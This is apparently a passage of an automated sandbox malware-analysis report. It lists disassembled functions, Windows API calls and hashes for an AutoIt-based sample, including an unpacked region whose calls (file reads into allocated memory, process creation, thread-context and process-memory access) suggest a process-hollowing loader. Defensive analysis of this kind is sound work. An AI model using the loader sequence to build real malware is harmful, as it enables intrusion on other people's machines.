                                                                              control_flow_graph 1414 401230-40123b 1415 401241-401272 call 4131f0 call 401be0 1414->1415 1416 4012c5-4012cd 1414->1416 1421 401274-401292 1415->1421 1422 4012ae-4012bf KillTimer SetTimer 1415->1422 1423 42aa61-42aa67 1421->1423 1424 401298-40129c 1421->1424 1422->1416 1427 42aa8b-42aaa7 Shell_NotifyIconW 1423->1427 1428 42aa69-42aa86 Shell_NotifyIconW 1423->1428 1425 4012a2-4012a8 1424->1425 1426 42aaac-42aab3 1424->1426 1425->1422 1429 42aaf8-42ab15 Shell_NotifyIconW 1425->1429 1430 42aad7-42aaf3 Shell_NotifyIconW 1426->1430 1431 42aab5-42aad2 Shell_NotifyIconW 1426->1431 1427->1422 1428->1422 1429->1422 1430->1422 1431->1422
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00401257
                                                                                • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              • KillTimer.USER32(?,?), ref: 004012B0
                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1792922140-0
                                                                              • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                              • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                              • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                              • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                              Function 03ECC228 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1432 3ecc228-3ecc2d6 call 3ec9c18 1435 3ecc2dd-3ecc303 call 3ecd138 CreateFileW 1432->1435 1438 3ecc30a-3ecc31a 1435->1438 1439 3ecc305 1435->1439 1444 3ecc31c 1438->1444 1445 3ecc321-3ecc33b VirtualAlloc 1438->1445 1440 3ecc455-3ecc459 1439->1440 1442 3ecc49b-3ecc49e 1440->1442 1443 3ecc45b-3ecc45f 1440->1443 1446 3ecc4a1-3ecc4a8 1442->1446 1447 3ecc46b-3ecc46f 1443->1447 1448 3ecc461-3ecc464 1443->1448 1444->1440 1449 3ecc33d 1445->1449 1450 3ecc342-3ecc359 ReadFile 1445->1450 1451 3ecc4fd-3ecc512 1446->1451 1452 3ecc4aa-3ecc4b5 1446->1452 1453 3ecc47f-3ecc483 1447->1453 1454 3ecc471-3ecc47b 1447->1454 1448->1447 1449->1440 1459 3ecc35b 1450->1459 1460 3ecc360-3ecc3a0 VirtualAlloc 1450->1460 1455 3ecc514-3ecc51f VirtualFree 1451->1455 1456 3ecc522-3ecc52a 1451->1456 1461 3ecc4b9-3ecc4c5 1452->1461 1462 3ecc4b7 1452->1462 1457 3ecc485-3ecc48f 1453->1457 1458 3ecc493 1453->1458 1454->1453 1455->1456 1457->1458 1458->1442 1459->1440 1463 3ecc3a7-3ecc3c2 call 3ecd388 1460->1463 1464 3ecc3a2 1460->1464 1465 3ecc4d9-3ecc4e5 1461->1465 1466 3ecc4c7-3ecc4d7 1461->1466 1462->1451 1472 3ecc3cd-3ecc3d7 1463->1472 1464->1440 1469 3ecc4e7-3ecc4f0 1465->1469 1470 3ecc4f2-3ecc4f8 1465->1470 1468 3ecc4fb 1466->1468 1468->1446 1469->1468 1470->1468 1473 3ecc3d9-3ecc408 call 3ecd388 1472->1473 1474 3ecc40a-3ecc41e call 3ecd198 1472->1474 1473->1472 1480 3ecc420 1474->1480 1481 3ecc422-3ecc426 1474->1481 1480->1440 1482 3ecc428-3ecc42c CloseHandle 1481->1482 1483 3ecc432-3ecc436 1481->1483 1482->1483 1484 3ecc438-3ecc443 VirtualFree 1483->1484 1485 3ecc446-3ecc44f 1483->1485 1484->1485 1485->1435 1485->1440
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03ECC2F9
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03ECC51F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                              • Instruction ID: 0e1292c3d7c17478e1bc2c6c97932bf706577e88fc2df2d6e911f2bb82beb0bc
                                                                              • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                              • Instruction Fuzzy Hash: CDA12874E10248EBDB14CFA4C984BEEB7B5FF48304F24929DE506BB280D7759A82CB55
                                                                              Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1486 414f10-414f2c 1487 414f4f 1486->1487 1488 414f2e-414f31 1486->1488 1489 414f51-414f55 1487->1489 1488->1487 1490 414f33-414f35 1488->1490 1491 414f37-414f46 call 417f23 1490->1491 1492 414f56-414f5b 1490->1492 1500 414f47-414f4c call 417ebb 1491->1500 1493 414f6a-414f6d 1492->1493 1494 414f5d-414f68 1492->1494 1497 414f7a-414f7c 1493->1497 1498 414f6f-414f77 call 4131f0 1493->1498 1494->1493 1496 414f8b-414f9e 1494->1496 1503 414fa0-414fa6 1496->1503 1504 414fa8 1496->1504 1497->1491 1502 414f7e-414f89 1497->1502 1498->1497 1500->1487 1502->1491 1502->1496 1505 414faf-414fb1 1503->1505 1504->1505 1508 4150a1-4150a4 1505->1508 1509 414fb7-414fbe 1505->1509 1508->1489 1511 414fc0-414fc5 1509->1511 1512 415004-415007 1509->1512 1511->1512 1513 414fc7 1511->1513 1514 415071-415072 call 41e6b1 1512->1514 1515 415009-41500d 1512->1515 1516 415102 1513->1516 1517 414fcd-414fd1 1513->1517 1526 415077-41507b 1514->1526 1519 41500f-415018 1515->1519 1520 41502e-415035 1515->1520 1521 415106-41510f 1516->1521 1524 414fd3 1517->1524 1525 414fd5-414fd8 1517->1525 1527 415023-415028 1519->1527 1528 41501a-415021 1519->1528 1522 415037 1520->1522 1523 415039-41503c 1520->1523 1521->1489 1522->1523 1529 415042-41504e call 41453a call 41ed9e 1523->1529 1530 4150d5-4150d9 1523->1530 1524->1525 1531 4150a9-4150af 1525->1531 1532 414fde-414fff call 41ee9b 1525->1532 1526->1521 1533 415081-415085 1526->1533 1534 41502a-41502c 1527->1534 1528->1534 1554 415053-415058 1529->1554 1539 4150eb-4150fd call 417f23 1530->1539 1540 4150db-4150e8 call 4131f0 1530->1540 1535 4150b1-4150bd call 4131f0 1531->1535 1536 4150c0-4150d0 call 417f23 1531->1536 1548 415099-41509b 1532->1548 1533->1530 1541 415087-415096 1533->1541 1534->1523 1535->1536 1536->1500 1539->1500 1540->1539 1541->1548 1548->1508 1548->1509 1555 415114-415118 1554->1555 1556 41505e-415061 1554->1556 1555->1521 1556->1516 1557 415067-41506f 1556->1557 1557->1548
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3886058894-0
                                                                              • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                              • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                              Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1558 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                              • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                              • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                              Function 03ECBFC8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1559 3ecbfc8-3ecc11e call 3ec9c18 call 3ecbeb8 CreateFileW 1566 3ecc125-3ecc135 1559->1566 1567 3ecc120 1559->1567 1570 3ecc13c-3ecc156 VirtualAlloc 1566->1570 1571 3ecc137 1566->1571 1568 3ecc1d5-3ecc1da 1567->1568 1572 3ecc158 1570->1572 1573 3ecc15a-3ecc171 ReadFile 1570->1573 1571->1568 1572->1568 1574 3ecc175-3ecc1af call 3ecbef8 call 3ecaeb8 1573->1574 1575 3ecc173 1573->1575 1580 3ecc1cb-3ecc1d3 ExitProcess 1574->1580 1581 3ecc1b1-3ecc1c6 call 3ecbf48 1574->1581 1575->1568 1580->1568 1581->1580
                                                                              APIs
                                                                                • Part of subcall function 03ECBEB8: Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03ECC114
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: H3X8AOTQ36PW7ORRR95UM0W29QFQ5
                                                                              • API String ID: 2694422964-252421423
                                                                              • Opcode ID: 7d08205459bea93951d844a3ca2320e211b7b0209a076aa72a83251997a75883
                                                                              • Instruction ID: d0fba81684d900066549f2b57de3c9322ef6c72dc3f77db916008f73ef1cdb8c
                                                                              • Opcode Fuzzy Hash: 7d08205459bea93951d844a3ca2320e211b7b0209a076aa72a83251997a75883
                                                                              • Instruction Fuzzy Hash: A2618430D18288DAEF11DBB4C848BEEBBB8AF15304F04419DE5587B2C1D7B91B49CB65
                                                                              Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1583 413a88-413a99 call 41718c 1586 413b10-413b15 call 4171d1 1583->1586 1587 413a9b-413aa2 1583->1587 1588 413aa4-413abc call 418407 call 419f6d 1587->1588 1589 413ae7 1587->1589 1601 413ac7-413ad7 call 413ade 1588->1601 1602 413abe-413ac6 call 419f9d 1588->1602 1593 413ae8-413af8 RtlFreeHeap 1589->1593 1593->1586 1594 413afa-413b0f call 417f23 GetLastError call 417ee1 1593->1594 1594->1586 1601->1586 1608 413ad9-413adc 1601->1608 1602->1601 1608->1593
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00413AA6
                                                                                • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                              • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                              • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                              • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                              Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                              • _strcat.LIBCMT ref: 0040F603
                                                                                • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 1194219731-2761332787
                                                                              • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                              • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                              • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                              • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                              Function 03ECAEB8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03ECB673
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ECB709
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ECB72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                              • Instruction ID: 68560e5f5f139f9f22dba9b5dbc431d8aea4765eaa8daa08d483684e23c177da
                                                                              • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                              • Instruction Fuzzy Hash: 18621B30A24259DBEB24CFA4C951BDEB376EF58300F1091A9D10DEB390E7769E81CB59
                                                                              Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1411284514-0
                                                                              • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                              • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                              • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                              • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                              Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                              • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                              Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                              • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                              Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00435278
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • _malloc.LIBCMT ref: 00435288
                                                                              • _malloc.LIBCMT ref: 00435298
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 680241177-0
                                                                              • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                              • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
